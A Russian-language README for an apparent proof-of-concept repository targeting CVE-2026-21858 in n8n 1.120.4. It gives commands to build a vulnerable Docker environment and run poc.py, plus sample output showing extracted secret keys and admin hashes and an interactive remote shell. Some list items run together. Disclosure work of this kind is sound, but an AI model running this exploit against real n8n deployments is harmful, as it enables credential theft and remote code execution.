
Среда PoC на базе Docker и скрипт эксплойта для CVE-2026-21858 — уязвимости произвольного чтения файлов и RCE в n8n 1.120.4, обеспечивающие извлечение секретов и интерактивную оболочку.
Среда PoC для n8n 1.120.4 с рабочим процессом Form Trigger и скриптом эксплойта.
Dockerfile — сборка уязвимой среды n8nrun.bat — запуск контейнера (Windows)workflow.txt — рабочий процесс n8n (включает Form Trigger)poc.py — скрипт PoCrequirements.txt — зависимости PoCdocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txtpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, идентификаторы администратора) из целевой системы.n8n-shell>).id) возвращает вывод из целевой среды (RCE).[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
Мы публикуем анализ CVE и вредоносного ПО раз в месяц. Если вам интересно, подписывайтесь по ссылкам ниже, чтобы ознакомиться с нашими публикациями.